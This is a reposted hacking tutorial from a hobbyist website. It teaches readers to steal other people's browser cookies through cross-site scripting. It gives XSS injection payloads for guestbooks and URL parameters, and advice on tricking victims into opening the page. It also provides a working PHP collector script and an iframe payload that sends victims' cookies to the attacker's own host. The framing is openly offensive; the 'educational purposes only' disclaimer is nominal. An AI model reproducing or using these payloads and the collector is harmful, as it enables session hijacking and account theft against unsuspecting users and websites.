| Home | Site Map | Yahoo Groups | Google Group | Updates | Terms Of Use | Feedback | FAQ's | Disclaimer | Support |
Home
Click-N-Learn
Downloads
Entertainment
Islamic Section
Kids Zone
Miscellaneous
Mobile
SMS Messages
Teen Corner
Tip & Tricks
Related Ads
Parteners

You are here:-> Home -> Click N Learn -> Hacking -> Internet

Cookie Stealing for phun and profit

[root@Athleone] ~
$ cat cookiestealing.txt

Cookie Stealing
Written by Athleone(or D4T4_L33CH)
===============================================
######################################################
0x10 Introduction

XSS (cross site scripting) is usually criticized. It is said that XSS can do nothing, actually. All it can do is make a nice little alert box on your screen, telling you your cookies. That is a wrong assumption. Although it may be slightly difficult, you can use XSS to steal a user's cookies. Cookies are used to store valuable information such as Username, Password, IP address and much more. This tutorial aims at teaching you Cookie Stealing, and by the end of this text file, you should be able to independently steal other people's cookies.

DISCLAIMER:
This text is for educational purposes only. The author will not be held liable for any damages that occur from a reader for following this text or even learning from it.

######################################################
0x20 Finding the vulnerability

First, you have to find the XSS vulnerability. This may prove to be a bit of a challenge, but for sites with lower security, this is actually quite easy. For example, have you ever seen one of those guestbooks? Some of them are not properly configured to filter the text you type in. What does this mean? It means that you can manipulate the HTML of the page, and inject javascript code! Alright, let's start off with something simple. Type this into the guestbook:
<script type="text/javascript">
alert(document.cookie)
</script>

Okay, now that's done, click enter. If the guestbook does not properly check its input, then you should be able to see your cookie pop up! Of course, if you type that in and it doesn't work, its probably gonna be a bit embarrassing, especially when the site admin taunts you. Anyway, to test whether a guestbook properly filters its input, type something like "You guys <b>suck</b>." and see if the "suck" comes up in bold text.
If it does, the guestbook is probably not configured to filter input. However, XSS is not limited to guest books. Places in which you can change the HTML such as a page that uses a URL parameter to display an image or text, can be injected with a healthy dose
of XSS. For example, the URL is this:
site/bla.php?whatever=lol.gif
Now, imagine what the HTML for the image would be like...
<img src="lol.gif">
so they add a "> at the back, which means we can do this:
(start URL here)
site/bla.php?whatever=lol.gif"><script type="text/javascript">
alert(document.cookie)</script><a href="test
(End url here)
and you're done!
######################################################

0x30 Opening the gate

(This chapter is only for those who chose the URL as the XSS injection point, by the way)
Alright, all this is nice and pretty, but as I have said at the top, people criticize XSS as it can only work in your browser.
This means that to get an enemy's password, you have to get him to sit down, login, and go to the injection page, then show you the alert box. Forgive my language, but like HELL that's going to work. You have to be smart. You have to TRICK them into going into the page, and then use a technique I will explain in a later section to get their cookies.
This tricking technique is something known as social engineering. Don't worry; it's not
complicated at all. All you have to do is fool your friend. For example, if the page you are fooling him into going into is the guestbook, then you can say something like "Look at this cool guestbook! (insert URL here)" Be Creative. Don't do it yet though, we still have the last piece of preparation to go...

######################################################

0x40 The Stealing
But once the luser goes to the site, what do you do then? "Hey, tell me all that info in that suspicious looking text box please?" Yeah right.
This is where the PHP code comes in. Get a free web host that supports PHP (preferably something like www.t35.com, although you will be breaking the rules in their TOS...) and make a new file. In the new file, type in this:


Code :-

<html>

<body>

<?php

$stuff=$_GET['stuff'] . "\n";

$fh=fopen('evil.txt','ab');

fwrite($fh,$stuff);

fclose($fh);

?>

</body>

</html>




Wheee that was fun. Alright, save it as evil.php. Now make an empty text file named evil.txt, and type some stuff into it such as "Cookie Stealer Phile (Newline here)". Alright, now you have to change the script that you put into the vulnerable site. Change it to

<IFRAME SRC="javascript:window.location=%22(site)/evil.php?stuff=%22+document.cookie" height="1" width="1" frameborder="0"></IFRAME>

Of course, change (site) into your site, and you are ready to go! Whenever a new luser gets lured into the trap, his cookies will be added to evil.txt!
######################################################

 

| Tell A Friend | Advertise With Us | Add to Favorites | Make Homepage | About Us | Contact Us | Links | Xchange | Privacy Policy |

© Copyright 2004-2009 www.FunKiTPk.110Mb.com. All Rights Reserved. Best Viewed at 800 X 600 Screen Resolution.

Disclaimer : All The Logos And Data Are The Property Of Their Respective Owners and Developer. All stuff found on this website have been collected from various sources across the web and are believed to be in the "public domain" and are provided for the eduactional & entertainment purposes only. If you are the rightful owner of any content/data posted in this webiste, and object to them being displayed , then please contact me at imtiaz459ali@gmail.com or at  (+92)(344)8287977  and it will be removed promptly.